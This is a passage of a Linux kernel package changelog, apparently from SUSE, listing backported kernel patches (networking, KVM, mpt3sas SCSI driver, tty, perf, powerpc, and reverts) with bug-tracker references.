(bnc#1012382). - ipmi:ssif: Fix handling of multi-part return messages (bnc#1012382). - ip: on queued skb use skb_header_pointer instead of pskb_may_pull (bnc#1012382). - ip: process in-order fragments efficiently (bnc#1012382). - ip: use rb trees for IP frag queue (bnc#1012382). - ipv4: frags: precedence bug in ip_expire() (bnc#1012382). - ipv6: Consider sk_bound_dev_if when binding a socket to an address (bnc#1012382). - ipv6: Consider sk_bound_dev_if when binding a socket to a v4 mapped address (bnc#1012382). - ipv6: fix kernel-infoleak in ipv6_local_error() (bnc#1012382). - ipv6: frags: rewrite ip6_expire_frag_queue() (bnc#1012382). - ipv6: Take rcu_read_lock in __inet6_bind for mapped addresses (bnc#1012382). - irqchip/gic-v3-its: Align PCI Multi-MSI allocation on their size (bnc#1012382). - isdn: hisax: hfc_pci: Fix a possible concurrency use-after-free bug in HFCPCI_l1hw() (bnc#1012382). - ixgbe: fix crash in build_skb Rx code path (git-fixes). - jffs2: Fix use of uninitialized delayed_work, lockdep breakage (bnc#1012382). - kABI: protect linux/kfifo.h include in hid-debug (kabi). - kABI: protect struct hda_bus (kabi). - kABI: protect struct inet_peer (kabi). - kabi: reorder new slabinfo fields in struct kmem_cache_node (bnc#1116653). - kallsyms: Handle too long symbols in kallsyms.c (bsc#1126805). - kaweth: use skb_cow_head() to deal with cloned skbs (bnc#1012382). - kconfig: fix file name and line number of warn_ignored_character() (bnc#1012382). - kconfig: fix memory leak when EOF is encountered in quotation (bnc#1012382). - kernel/exit.c: release ptraced tasks before zap_pid_ns_processes (bnc#1012382). - kernel/hung_task.c: break RCU locks based on jiffies (bnc#1012382). - KMPs: obsolete older KMPs of the same flavour (bsc#1127155, bsc#1109137). - kvm: arm/arm64: vgic-its: Check CBASER/BASER validity before enabling the ITS (bsc#1109248). - kvm: arm/arm64: vgic-its: Check GITS_BASER Valid bit before saving tables (bsc#1109248). - kvm: arm/arm64: vgic-its: Fix return value for device table restore (bsc#1109248). - kvm: arm/arm64: vgic-its: Fix vgic_its_restore_collection_table returned value (bsc#1109248). - kvm: nVMX: Do not halt vcpu when L1 is injecting events to L2 (bsc#1129413). - kvm: nVMX: Free the VMREAD/VMWRITE bitmaps if alloc_kvm_area() fails (bsc#1129414). - kvm: nVMX: NMI-window and interrupt-window exiting should wake L2 from HLT (bsc#1129415). - kvm: nVMX: Set VM instruction error for VMPTRLD of unbacked page (bsc#1129416). - kvm: VMX: Do not allow reexecute_instruction() when skipping MMIO instr (bsc#1129417). - kvm: VMX: Fix x2apic check in vmx_msr_bitmap_mode() (bsc#1124166). - kvm: VMX: Missing part of upstream commit 904e14fb7cb9 (bsc#1124166). - kvm: vmx: Set IA32_TSC_AUX for legacy mode guests (bsc#1129418). - kvm: x86: Add AMD's EX_CFG to the list of ignored MSRs (bsc#1127082). - kvm: x86: Fix single-step debugging (bnc#1012382). - kvm: x86: IA32_ARCH_CAPABILITIES is always supported (bsc#1129419). - kvm: x86: svm: report MSR_IA32_MCG_EXT_CTL as unsupported (bnc#1012382). - l2tp: copy 4 more bytes to linear part if necessary (bnc#1012382). - l2tp: fix reading optional fields of L2TPv3 (bnc#1012382). - l2tp: remove l2specific_len dependency in l2tp_core (bnc#1012382). - libceph: avoid KEEPALIVE_PENDING races in ceph_con_keepalive() (bsc#1125810). - libceph: handle an empty authorize reply (bsc#1126772). - libnvdimm: fix ars_status output length calculation (bsc#1124777). - libnvdimm, pfn: Pad pfn namespaces relative to other regions (bsc#1124811). - libnvdimm: Use max contiguous area for namespace size (bsc#1124780). - locking/rwsem: Fix (possible) missed wakeup (bsc#1050549). - loop: Fix double mutex_unlock(&loop_ctl_mutex) in loop_control_ioctl() (bnc#1012382). - loop: Fold __loop_release into loop_release (bnc#1012382). - loop: Get rid of loop_index_mutex (bnc#1012382). - LSM: Check for NULL cred-security on free (bnc#1012382). - mac80211: ensure that mgmt tx skbs have tailroom for encryption (bnc#1012382). - mac80211: fix radiotap vendor presence bitmap handling (bnc#1012382). - md: batch flush requests (bsc#1119680). - mdio_bus: Fix use-after-free on device_register fails (git-fixes). - media: DaVinci-VPBE: fix error handling in vpbe_initialize() (bnc#1012382). - media: em28xx: Fix misplaced reset of dev->v4l::field_count (bnc#1012382). - media: firewire: Fix app_info parameter type in avc_ca{,_app}_info (bnc#1012382). - media: vb2: be sure to unlock mutex on errors (bnc#1012382). - media: vb2: vb2_mmap: move lock up (bnc#1012382). - media: vivid: fix error handling of kthread_run (bnc#1012382). - media: vivid: set min width/height to a value > 0 (bnc#1012382). - memstick: Prevent memstick host from getting runtime suspended during card detection (bnc#1012382). - mfd: as3722: Handle interrupts on suspend (bnc#1012382). - mfd: as3722: Mark PM functions as __maybe_unused (bnc#1012382). - mfd: tps6586x: Handle interrupts on suspend (bnc#1012382). - misc: vexpress: Off by one in vexpress_syscfg_exec() (bnc#1012382). - mISDN: fix a race in dev_expire_timer() (bnc#1012382). - mlxsw: pci: Correctly determine if descriptor queue is full (git-fixes). - mlxsw: reg: Use correct offset in field definiton (git-fixes). - mmc: atmel-mci: do not assume idle after atmci_request_end (bnc#1012382). - mmc: bcm2835: Fix DMA channel leak on probe error (bsc#1120902). - mmc: sdhci-iproc: handle mmc_of_parse() errors during probe (bnc#1012382). - mm, devm_memremap_pages: mark devm_memremap_pages() EXPORT_SYMBOL_GPL (bnc#1012382). - mm,memory_hotplug: fix scan_movable_pages() for gigantic hugepages (bsc#1127731). - mm: migrate: do not rely on __PageMovable() of newpage after unlocking it (bnc#1012382). - mm: only report isolation failures when offlining memory (generic hotplug debugability). - mm, oom: fix use-after-free in oom_kill_process (bnc#1012382). - mm, page_alloc: drop should_suppress_show_mem (bnc#1125892, bnc#1106061). - mm/page-writeback.c: do not break integrity writeback on ->writepage() error (bnc#1012382). - mm, proc: be more verbose about unstable VMA flags in /proc/<pid>/smaps (bnc#1012382). - mm, slab: faster active and free stats (bsc#116653, VM Performance). - mm/slab: improve performance of gathering slabinfo stats (bsc#116653, VM Performance). - mm, slab: maintain total slab count instead of active count (bsc#116653, VM Performance). - modpost: validate symbol names also in find_elf_symbol (bnc#1012382). - mtd: rawnand: gpmi: fix MX28 bus master lockup problem (bnc#1012382). - net: Add header for usage of fls64() (bnc#1012382). - net: bridge: fix a bug on using a neighbour cache entry without checking its state (bnc#1012382). - net: bridge: Fix ethernet header pointer before check skb forwardable (bnc#1012382). - net: call sk_dst_reset when set SO_DONTROUTE (bnc#1012382). - net: Do not allocate page fragments that are not skb aligned (bnc#1012382). - net: dp83640: expire old TX-skb (bnc#1012382). - net: dsa: bcm_sf2: Do not assume DSA master supports WoL (git-fixes). - net: dsa: mv88e6xxx: fix port VLAN maps (git-fixes). - net: dsa: slave: Do not propagate flag changes on down slave interfaces (bnc#1012382). - net: Fix for_each_netdev_feature on Big endian (bnc#1012382). - net: fix IPv6 prefix route residue (bnc#1012382). - net: fix pskb_trim_rcsum_slow() with odd trim offset (bnc#1012382). - net: Fix usage of pskb_trim_rcsum (bnc#1012382). - net/hamradio/6pack: Convert timers to use timer_setup() (git-fixes). - net/hamradio/6pack: use mod_timer() to rearm timers (git-fixes). - net: ieee802154: 6lowpan: fix frag reassembly (bnc#1012382). - net: ipv4: do not handle duplicate fragments as overlapping (bnc#1012382 bsc#1116345). - net: ipv4: Fix memory leak in network namespace dismantle (bnc#1012382). - net: ipv4: use a dedicated counter for icmp_v4 redirect packets (bnc#1012382). - net: lan78xx: Fix race in tx pending skb size calculation (git-fixes). - net/mlx4_core: Add masking for a few queries on HCA caps (bnc#1012382). - net/mlx4_core: drop useless LIST_HEAD (git-fixes). - net/mlx4_core: Fix qp mtt size calculation (git-fixes). - net/mlx4_core: Fix reset flow when in command polling mode (git-fixes). - net/mlx4: Fix endianness issue in qp context params (git-fixes). - net/mlx5: Continue driver initialization despite debugfs failure (git-fixes). - net/mlx5e: Fix TCP checksum in LRO buffers (git-fixes). - net/mlx5: Fix driver load bad flow when having fw initializing timeout (git-fixes). - net/mlx5: fix uaccess beyond "count" in debugfs read/write handlers (git-fixes). - net/mlx5: Fix use-after-free in self-healing flow (git-fixes). - net/mlx5: Return success for PAGE_FAULT_RESUME in internal error state (git-fixes). - net: modify skb_rbtree_purge to return the truesize of all purged skbs (bnc#1012382). - net: mv643xx_eth: fix packet corruption with TSO and tiny unaligned packets (git-fixes). - net: phy: Avoid polling PHY with PHY_IGNORE_INTERRUPTS (git-fixes). - net: phy: bcm7xxx: Fix shadow mode 2 disabling (git-fixes). - net: pskb_trim_rcsum() and CHECKSUM_COMPLETE are friends (bnc#1012382). - net: qca_spi: Fix race condition in spi transfers (git-fixes). - netrom: switch to sock timer API (bnc#1012382). - net/rose: fix NULL ax25_cb kernel panic (bnc#1012382). - net_sched: refetch skb protocol for each filter (bnc#1012382). - net: speed up skb_rbtree_purge() (bnc#1012382). - net: stmmac: Fix a race in EEE enable callback (bnc#1012382). - net: stmmac: Fix a race in EEE enable callback (git-fixes). - net: systemport: Fix WoL with password after deep sleep (bnc#1012382). - net: thunderx: set tso_hdrs pointer to NULL in nicvf_free_snd_queue (git-fixes). - net/x25: do not hold the cpu too long in x25_new_lci() (bnc#1012382). - NFC: nxp-nci: Include unaligned.h instead of access_ok.h (bnc#1012382). - nfit: fix unchecked dereference in acpi_nfit_ctl (bsc#1125014). - nfsd4: fix crash on writing v4_end_grace before nfsd startup (bnc#1012382). - NFS: nfs_compare_mount_options always compare auth flavors (bnc#1012382). - niu: fix missing checks of niu_pci_eeprom_read (bnc#1012382). - ocfs2: do not clear bh uptodate for block read (bnc#1012382). - ocfs2: fix panic due to unrecovered local alloc (bnc#1012382). - omap2fb: Fix stack memory disclosure (bsc#1106929) - openvswitch: Avoid OOB read when parsing flow nlattrs (bnc#1012382). - packet: Do not leak dev refcounts on error exit (bnc#1012382). - pci: altera: Check link status before retrain link (bnc#1012382). - pci: altera: Fix altera_pcie_link_is_up() (bnc#1012382). - pci: altera: Move retrain from fixup to altera_pcie_host_init() (bnc#1012382). - pci: altera: Poll for link training status after retraining the link (bnc#1012382). - pci: altera: Poll for link up status after retraining the link (bnc#1012382). - pci: altera: Reorder read/write functions (bnc#1012382). - pci: altera: Rework config accessors for use without a struct pci_bus (bnc#1012382). - pci/PME: Fix hotplug/sysfs remove deadlock in pcie_pme_remove() (bsc#1129241). - perf/core: Do not WARN() for impossible ring-buffer sizes (bnc#1012382). - perf/core: Fix impossible ring-buffer sizes warning (bnc#1012382). - perf intel-pt: Fix error with config term "pt=0" (bnc#1012382). - perf parse-events: Fix unchecked usage of strncpy() (bnc#1012382). - perf svghelper: Fix unchecked usage of strncpy() (bnc#1012382). - perf tests evsel-tp-sched: Fix bitwise operator (bnc#1012382). - perf tools: Add Hygon Dhyana support (bnc#1012382). - perf unwind: Take pgoff into account when reporting elf to libdwfl (bnc#1012382). - perf unwind: Unwind with libdw does not take symfs into account (bnc#1012382). - perf/x86: Add sysfs entry to freeze counters on SMI (bsc#1121805). - perf/x86/intel: Delay memory deallocation until x86_pmu_dead_cpu() (bsc#1121805). - perf/x86/intel: Do not enable freeze-on-smi for PerfMon V1 (bsc#1121805). - perf/x86/intel: Fix memory corruption (bsc#1121805). - perf/x86/intel: Generalize dynamic constraint creation (bsc#1121805). - perf/x86/intel: Implement support for TSX Force Abort (bsc#1121805). - perf/x86/intel: Make cpuc allocations consistent (bsc#1121805). - perf/x86/intel/uncore: Add Node ID mask (bnc#1012382). - phy: micrel: Ensure interrupts are reenabled on resume (git-fixes). - pinctrl: msm: fix gpio-hog related boot issues (bnc#1012382). - platform/x86: asus-nb-wmi: Drop mapping of 0x33 and 0x34 scan codes (bnc#1012382). - platform/x86: asus-nb-wmi: Map 0x35 to KEY_SCREENLOCK (bnc#1012382). - platform/x86: asus-wmi: Tell the EC the OS will handle the display off hotkey (bnc#1012382). - platform/x86: thinkpad_acpi: Proper model/release matching (bsc#1099810). - powerpc/cacheinfo: Report the correct shared_cpu_map on big-cores (bsc#1109695). - powerpc: Detect the presence of big-cores via "ibm, thread-groups" (bsc#1109695). - powerpc, hotplug: Avoid to touch non-existent cpumasks (bsc#1109695). - powerpc: make use of for_each_node_by_type() instead of open-coding it (bsc#1109695). - powerpc/pseries: Add CPU dlpar remove functionality (bsc#1128756). - powerpc/pseries: add of_node_put() in dlpar_detach_node() (bnc#1012382). - powerpc/pseries: Consolidate CPU hotplug code to hotplug-cpu.c (bsc#1128756). - powerpc/pseries/cpuidle: Fix preempt warning (bnc#1012382). - powerpc/pseries: Factor out common cpu hotplug code (bsc#1128756). - powerpc/pseries: Perform full re-add of CPU for topology update post-migration (bsc#1128756). - powerpc/setup: Add cpu_to_phys_id array (bsc#1109695). - powerpc/smp: Add cpu_l2_cache_map (bsc#1109695). - powerpc/smp: Add Power9 scheduler topology (bsc#1109695). - powerpc/smp: Rework CPU topology construction (bsc#1109695). - powerpc/smp: Use cpu_to_chip_id() to find core siblings (bsc#1109695). - powerpc/uaccess: fix warning/error with access_ok() (bnc#1012382). - powerpc: Use cpu_smallcore_sibling_mask at SMT level on bigcores (bsc#1109695). - powerpc/xmon: Fix invocation inside lock region (bsc#1122885). - pppoe: fix reception of frames with no mac header (git-fixes). - pptp: dst_release sk_dst_cache in pptp_sock_destruct (git-fixes). - proc: Remove empty line in /proc/self/status (bnc#1012382 bsc#1094823). - pseries/energy: Use OF accessor function to read ibm,drc-indexes (bsc#1129080). - pstore/ram: Do not treat empty buffers as valid (bnc#1012382). - ptp: check gettime64 return code in PTP_SYS_OFFSET ioctl (bnc#1012382). - r8169: Add support for new Realtek Ethernet (bnc#1012382). - rbd: do not return 0 on unmap if RBD_DEV_FLAG_REMOVING is set (bsc#1125808). - rcu: Force boolean subscript for expedited stall warnings (bnc#1012382). - RDMA/bnxt_re: Fix a couple off by one bugs (bsc#1020413, ). - RDMA/bnxt_re: Synchronize destroy_qp with poll_cq (bsc#1125446). - Revert "bs-upload-kernel: do not set %opensuse_bs" This reverts commit e89e2b8cbef05df6c874ba70af3cb4c57f82a821. - Revert "cifs: In Kconfig CONFIG_CIFS_POSIX needs depends on legacy (insecure cifs)" (bnc#1012382). - Revert "exec: load_script: do not blindly truncate shebang string" (bnc#1012382). - Revert "Input: elan_i2c - add ACPI ID for touchpad in ASUS Aspire F5-573G" (bnc#1012382). - Revert "loop: Fix double mutex_unlock(&loop_ctl_mutex) in loop_control_ioctl()" (bnc#1012382). - Revert "loop: Fold __loop_release into loop_release" (bnc#1012382). - Revert "loop: Get rid of loop_index_mutex" (bnc#1012382). - Revert "mmc: bcm2835: Fix DMA channel leak on probe error (bsc#1120902)." The backport patch does not built properly. - Revert "mm, devm_memremap_pages: mark devm_memremap_pages() EXPORT_SYMBOL_GPL" (bnc#1012382). - Revert "net: stmmac: Fix a race in EEE enable callback (git-fixes)." This reverts commit f323fa8d233c1f44aff17e6fae90c2c8be30edf9. The patch was already included in stable 4.4.176. - Revert "sd: disable logical block provisioning if 'lbpme' is not set" This reverts commit 96370bd87299c7a6883b3e2bf13818f60c8ba611. Patch not accepted upstream. - Revert "x86/platform/UV: Use efi_runtime_lock to serialise BIOS calls" (bsc#1128565). - rhashtable: Add rhashtable_lookup() (bnc#1012382). - rhashtable: add rhashtable_lookup_get_insert_key() (bnc#1012382 bsc#1042286). - rhashtable: add schedule points (bnc#1012382). - rhashtable: reorganize struct rhashtable layout (bnc#1012382). - s390/early: improve machine detection (bnc#1012382). - s390/qeth: cancel close_dev work before removing a card (LTC#175898, bsc#1127561). - s390/smp: Fix calling smp_call_ipl_cpu() from ipl CPU (bnc#1012382). - s390/smp: fix CPU hotplug deadlock with CPU rescan (bnc#1012382). - sata_rcar: fix deferred probing (bnc#1012382). - sched/wake_q: Document wake_q_add() (bsc#1050549). - sched/wake_q: Fix wakeup ordering for wake_q (bsc#1050549). - sched/wake_q: Reduce reference counting for special users (bsc#1050549). - scripts/decode_stacktrace: only strip base path when a prefix of the path (bnc#1012382). - scripts/git_sort/git_sort.py: Add mkp/scsi 5.0/scsi-fixes - scsi: aacraid: Fix missing break in switch statement (bsc#1128696). - scsi: ibmvscsi: Fix empty event pool access during host removal (bsc#1119019). - scsi: lpfc: Correct LCB RJT handling (bnc#1012382). - scsi: lpfc: Correct MDS diag and nvmet configuration (bsc#1125796). - scsi: lpfc: do not set queue->page_count to 0 if pc_sli4_params.wqpcnt is invalid (bsc#1127725). - scsi: megaraid: fix out-of-bound array accesses (bnc#1012382). - scsi: mpt3sas: Add an I/O barrier (bsc#1117108). - scsi: mpt3sas: Added support for nvme encapsulated request message (bsc#1117108). - scsi: mpt3sas: Added support for SAS Device Discovery Error Event (bsc#1117108). - scsi: mpt3sas: Adding support for SAS3616 HBA device (bsc#1117108). - scsi: mpt3sas: Add ioc_<level> logging macros (bsc#1117108). - scsi: mpt3sas: Add nvme device support in slave alloc, target alloc and probe (bsc#1117108). - scsi: mpt3sas: Add PCI device ID for Andromeda (bsc#1117108). - scsi: mpt3sas: Add-Task-management-debug-info-for-NVMe-drives (bsc#1117108). - scsi: mpt3sas: Allow processing of events during driver unload (bsc#1117108). - scsi: mpt3sas: always use first reserved smid for ioctl passthrough (bsc#1117108). - scsi: mpt3sas: Annotate switch/case fall-through (bsc#1117108). - scsi: mpt3sas: API's to remove nvme drive from sml (bsc#1117108). - scsi: mpt3sas: API 's to support NVMe drive addition to SML (bsc#1117108). - scsi: mpt3sas: As per MPI-spec, use combined reply queue for SAS3.5 controllers when HBA supports more than 16 MSI-x vectors (bsc#1117108). - scsi: mpt3sas: Bug fix for big endian systems (bsc#1117108). - scsi: mpt3sas: Bump mpt3sas driver version to v16.100.00.00 (bsc#1117108). - scsi: mpt3sas: Cache enclosure pages during enclosure add (bsc#1117108). - scsi: mpt3sas: check command status before attempting abort (bsc#1117108). - scsi: mpt3sas: clarify mmio pointer types (bsc#1117108). - scsi: mpt3sas: cleanup _scsih_pcie_enumeration_event() (bsc#1117108). - scsi: mpt3sas: Configure reply post queue depth, DMA and sgl tablesize (bsc#1117108). - scsi: mpt3sas: Convert logging uses with MPT3SAS_FMT and reply_q_name to %s: (bsc#1117108). - scsi: mpt3sas: Convert logging uses with MPT3SAS_FMT without logging levels (bsc#1117108). - scsi: mpt3sas: Convert mlsleading uses of pr_<level> with MPT3SAS_FMT (bsc#1117108). - scsi: mpt3sas: Convert uses of pr_<level> with MPT3SAS_FMT to ioc_<level> (bsc#1117108). - scsi: mpt3sas: Display chassis slot information of the drive (bsc#1117108). - scsi: mpt3sas: Do not abort I/Os issued to NVMe drives while processing Async Broadcast primitive event (bsc#1117108). - scsi: mpt3sas: Do not access the structure after decrementing it's instance reference count (bsc#1117108). - scsi: mpt3sas: Do not use 32-bit atomic request descriptor for Ventura controllers (bsc#1117108). - scsi: mpt3sas: Enhanced handling of Sense Buffer (bsc#1117108). - scsi: mpt3sas: fix an out of bound write (bsc#1117108). - scsi: mpt3sas: Fix a race condition in mpt3sas_base_hard_reset_handler() (bsc#1117108). - scsi: mpt3sas: Fix calltrace observed while running IO & reset (bsc#1117108). - scsi: mpt3sas: fix dma_addr_t casts (bsc#1117108). - scsi: mpt3sas: Fixed memory leaks in driver (bsc#1117108). - scsi: mpt3sas: Fix, False timeout prints for ioctl and other internal commands during controller reset (bsc#1117108). - scsi: mpt3sas: fix format overflow warning (bsc#1117108). - scsi: mpt3sas: Fix indentation (bsc#1117108). - scsi: mpt3sas: Fix memory allocation failure test in 'mpt3sas_base_attach()' (bsc#1117108). - scsi: mpt3sas: Fix nvme drives checking for tlr (bsc#1117108). - scsi: mpt3sas: fix oops in error handlers after shutdown/unload (bsc#1117108). - scsi: mpt3sas: Fix possibility of using invalid Enclosure Handle for SAS device after host reset (bsc#1117108). - scsi: mpt3sas: fix possible memory leak (bsc#1117108). - scsi: mpt3sas: fix pr_info message continuation (bsc#1117108). - scsi: mpt3sas: Fix removal and addition of vSES device during host reset (bsc#1117108). - scsi: mpt3sas: Fix sparse warnings (bsc#1117108). - scsi: mpt3sas: fix spelling mistake: "disbale" -> "disable" (bsc#1117108). - scsi: mpt3sas: For NVME device, issue a protocol level reset (bsc#1117108). - scsi: mpt3sas: Handle NVMe PCIe device related events generated from firmware (bsc#1117108). - scsi: mpt3sas: Improve kernel-doc headers (bsc#1117108). - scsi: mpt3sas: Incorrect command status was set/marked as not used (bsc#1117108). - scsi: mpt3sas: Increase event log buffer to support 24 port HBA's (bsc#1117108). - scsi: mpt3sas: Introduce API to get BAR0 mapped buffer address (bsc#1117108). - scsi: mpt3sas: Introduce Base function for cloning (bsc#1117108). - scsi: mpt3sas: Introduce function to clone mpi reply (bsc#1117108). - scsi: mpt3sas: Introduce function to clone mpi request (bsc#1117108). - scsi: mpt3sas: Introduce mpt3sas_get_st_from_smid() (bsc#1117108). - scsi: mpt3sas: Introduce struct mpt3sas_nvme_cmd (bsc#1117108). - scsi: mpt3sas: Lockless access for chain buffers (bsc#1117108). - scsi: mpt3sas: lockless command submission (bsc#1117108). - scsi: mpt3sas: make function _get_st_from_smid static (bsc#1117108). - scsi: mpt3sas: NVMe drive support for BTDHMAPPING ioctl command and log info (bsc#1117108). - scsi: mpt3sas: open-code _scsih_scsi_lookup_get() (bsc#1117108). - scsi: mpt3sas: Optimize I/O memory consumption in driver (bsc#1117108). - scsi: mpt3sas: Pre-allocate RDPQ Array at driver boot time (bsc#1117108). - scsi: mpt3sas: Processing of Cable Exception events (bsc#1117108). - scsi: mpt3sas: Reduce memory footprint in kdump kernel (bsc#1117108). - scsi: mpt3sas: remove a stray KERN_INFO (bsc#1117108). - scsi: mpt3sas: Remove KERN_WARNING from panic uses (bsc#1117108). - scsi: mpt3sas: remove redundant copy_from_user in _ctl_getiocinfo (bsc#1117108). - scsi: mpt3sas: remove redundant wmb (bsc#1117108). - scsi: mpt3sas: Remove set-but-not-used variables (bsc#1117108). - scsi: mpt3sas: Remove unnecessary parentheses and simplify null checks (bsc#1117108). - scsi: mpt3sas: Remove unused macro MPT3SAS_FMT (bsc#1117108). - scsi: mpt3sas: Remove unused variable requeue_event (bsc#1117108). - scsi: mpt3sas: Replace PCI pool old API (bsc#1117108). - scsi: mpt3sas: Replace PCI pool old API (bsc#1117108). - scsi: mpt3sas: Report Firmware Package Version from HBA Driver (bsc#1117108). - scsi: mpt3sas: scan and add nvme device after controller reset (bsc#1117108). - scsi: mpt3sas: separate out _base_recovery_check() (bsc#1117108). - scsi: mpt3sas: set default value for cb_idx (bsc#1117108). - scsi: mpt3sas: Set NVMe device queue depth as 128 (bsc#1117108). - scsi: mpt3sas: SGL to PRP Translation for I/Os to NVMe devices (bsc#1117108). - scsi: mpt3sas: simplify mpt3sas_scsi_issue_tm() (bsc#1117108). - scsi: mpt3sas: simplify task management functions (bsc#1117108). - scsi: mpt3sas: simplify _wait_for_commands_to_complete() (bsc#1117108). - scsi: mpt3sas: Split _base_reset_handler(), mpt3sas_scsih_reset_handler() and mpt3sas_ctl_reset_handler() (bsc#1117108). - scsi: mpt3sas: Swap I/O memory read value back to cpu endianness (bsc#1117108). - scsi: mpt3sas: switch to generic DMA API (bsc#1117108). - scsi: mpt3sas: switch to pci_alloc_irq_vectors (bsc#1117108). - scsi: mpt3sas: Updated MPI headers to v2.00.48 (bsc#1117108). - scsi: mpt3sas: Update driver version "25.100.00.00" (bsc#1117108). - scsi: mpt3sas: Update driver version "26.100.00.00" (bsc#1117108). - scsi: mpt3sas: Update MPI Headers (bsc#1117108). - scsi: mpt3sas: Update mpt3sas driver version (bsc#1117108). - scsi: mpt3sas: Use dma_pool_zalloc (bsc#1117108). - scsi: mpt3sas: use list_splice_init() (bsc#1117108). - scsi: mpt3sas: wait for and flush running commands on shutdown/unload (bsc#1117108). - scsi: qla2xxx: Fix deadlock between ATIO and HW lock (bsc#1125794). - scsi: qla2xxx: Fix early srb free on abort (bsc#1121713). - scsi: qla2xxx: Fix for double free of SRB structure (bsc#1121713). - scsi: qla2xxx: Increase abort timeout value (bsc#1121713). - scsi: qla2xxx: Move {get|rel}_sp to base_qpair struct (bsc#1121713). - scsi: qla2xxx: Return switch command on a timeout (bsc#1121713). - scsi: qla2xxx: Turn off IOCB timeout timer on IOCB completion (bsc#1121713). - scsi: qla2xxx: Use correct qpair for ABTS/CMD (bsc#1121713). - scsi: sd: Fix cache_type_store() (bnc#1012382). - scsi: sym53c8xx: fix NULL pointer dereference panic in sym_int_sir() (bsc#1125315). - scsi: target: make the pi_prot_format ConfigFS path readable (bsc#1123933). - scsi: target: use consistent left-aligned ASCII INQUIRY data (bnc#1012382). - sctp: allocate sctp_sockaddr_entry with kzalloc (bnc#1012382). - sd: disable logical block provisioning if 'lbpme' is not set (bsc#1086095 bsc#1078355). - selinux: fix GPF on invalid policy (bnc#1012382). - seq_buf: Make seq_buf_puts() null-terminate the buffer (bnc#1012382). - serial: fsl_lpuart: clear parity enable bit when disable parity (bnc#1012382). - series.conf: Move 'patches.fixes/aio-hold-an-extra-file-reference-over-AIO-read-write.patch' into sorted section. - signal: Always notice exiting tasks (bnc#1012382). - signal: Better detection of synchronous signals (bnc#1012382). - signal: Restore the stop PTRACE_EVENT_EXIT (bnc#1012382). - skge: potential memory corruption in skge_get_regs() (bnc#1012382). - sky2: Increase D3 delay again (bnc#1012382). - slab: alien caches must not be initialized if the allocation of the alien cache failed (bnc#1012382). - smack: fix access permissions for keyring (bnc#1012382). - smsc95xx: Use skb_cow_head to deal with cloned skbs (bnc#1012382). - soc/tegra: Do not leak device tree node reference (bnc#1012382). - staging:iio:ad2s90: Make probe handle spi_setup failure (bnc#1012382). - staging: iio: ad7780: update voltage on read (bnc#1012382). - staging: iio: adc: ad7280a: handle error from __ad7280_read32() (bnc#1012382). - staging: rtl8188eu: Add device code for D-Link DWA-121 rev B1 (bnc#1012382). - sunrpc: handle ENOMEM in rpcb_getport_async (bnc#1012382). - sunvdc: Do not spin in an infinite loop when vio_ldc_send() returns EAGAIN (bnc#1012382). - sysfs: Disable lockdep for driver bind/unbind files (bnc#1012382). - tcp: clear icsk_backoff in tcp_write_queue_purge() (bnc#1012382). - tcp: tcp_v4_err() should be more careful (bnc#1012382). - team: avoid complex list operations in team_nl_cmd_options_set() (bnc#1012382). - team: Free BPF filter when unregistering netdev (git-fixes). - test_hexdump: use memcpy instead of strncpy (bnc#1012382). - thermal: hwmon: inline helpers when CONFIG_THERMAL_HWMON is not set (bnc#1012382). - timekeeping: Use proper seqcount initializer (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_bearer_enable (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_doit (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_link_reset_stats (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_link_set (bnc#1012382). - tipc: fix uninit-value in tipc_nl_compat_name_table_dump (bnc#1012382). - tipc: use destination length for copy string (bnc#1012382). - tracing: Do not free iter->trace in fail path of tracing_open_pipe() (bsc#1129581). - tracing/uprobes: Fix output for multiple string arguments (bnc#1012382). - tty: Do not block on IO when ldisc change is pending (bnc#1105428). - tty: Do not hold ldisc lock in tty_reopen() if ldisc present (bnc#1105428). - tty: fix data race between tty_init_dev and flush of buf (bnc#1105428). - tty: Handle problem if line discipline does not have receive_buf (bnc#1012382). - tty: Hold tty_ldisc_lock() during tty_reopen() (bnc#1105428). - tty/ldsem: Add lockdep asserts for ldisc_sem (bnc#1105428). - tty/ldsem: Convert to regular lockdep annotations (bnc#1105428). - tty/ldsem: Decrement wait_readers on timeouted down_read() (bnc#1105428). - tty/ldsem: Wake up readers after timed out down_write() (bnc#1012382). - tty/n_hdlc: fix __might_sleep warning (bnc#1012382). - tty: serial: samsung: Properly set flags in autoCTS mode (bnc#1012382). - tty: Simplify tty->count math in tty_reopen() (bnc#1105428). - uapi/if_ether.h: move __UAPI_DEF_ETHHDR libc define (bnc#1012382). - uapi/if_ether.h: prevent redefinition of struct ethhdr (bnc#1012382). - ucc_geth: Reset BQL queue when stopping device (bnc#1012382). - udf: Fix BUG on corrupted inode (bnc#1012382). - um: Avoid marking pages with "changed protection" (bnc#1012382). - usb: Add USB_QUIRK_DELAY_CTRL_MSG quirk for Corsair K70 RGB (bnc#1012382). - usb: cdc-acm: send ZLP for Telit 3G Intel based modems (bnc#1012382). - usb: dwc2: Remove unnecessary kfree (bnc#1012382). - usb: gadget: udc: net2272: Fix bitwise and boolean operations (bnc#1012382). - usb: hub: delay hub autosuspend if USB3 port is still link training (bnc#1012382). - usb: phy: am335x: fix race condition in _probe (bnc#1012382). - usb: serial: pl2303: add new PID to support PL2303TB (bnc#1012382). - usb: serial: simple: add Motorola Tetra TPG2200 device id (bnc#1012382). - usb: storage: add quirk for SMI SM3350 (bnc#1012382). - usb: storage: do not insert sane sense for SPC3+ when bad sense specified (bnc#1012382). - video: clps711x-fb: release disp device node in probe() (bnc#1012382). - vsock: cope with memory allocation failure at socket creation time (bnc#1012382). - vt: invoke notifier on screen size change (bnc#1012382). - vxlan: test dev->flags & IFF_UP before calling netif_rx() (bnc#1012382). - wireless: airo: potential buffer overflow in sprintf() (bsc#1120902). - writeback: do not decrement wb->refcnt if !wb->bdi (git fixes (writeback)). - x86: Add TSX Force Abort CPUID/MSR (bsc#1121805). - x86/a.out: Clear the dump structure initially (bnc#1012382). - x86/fpu: Add might_fault() to user_insn() (bnc#1012382). - x86/kaslr: Fix incorrect i8254 outb() parameters (bnc#1012382). - x86: livepatch: Treat R_X86_64_PLT32 as R_X86_64_PC32 (bnc#1012382). - x86/MCE: Initialize mce.bank in the case of a fatal error in mce_no_way_out() (bnc#1012382). - x86/PCI: Fix Broadcom CNB20LE unintended sign extension (redux) (bnc#1012382). - x86/pkeys: Properly copy pkey state at fork() (bsc#1106105). - x86/platform/UV: Use efi_runtime_lock to serialise BIOS calls 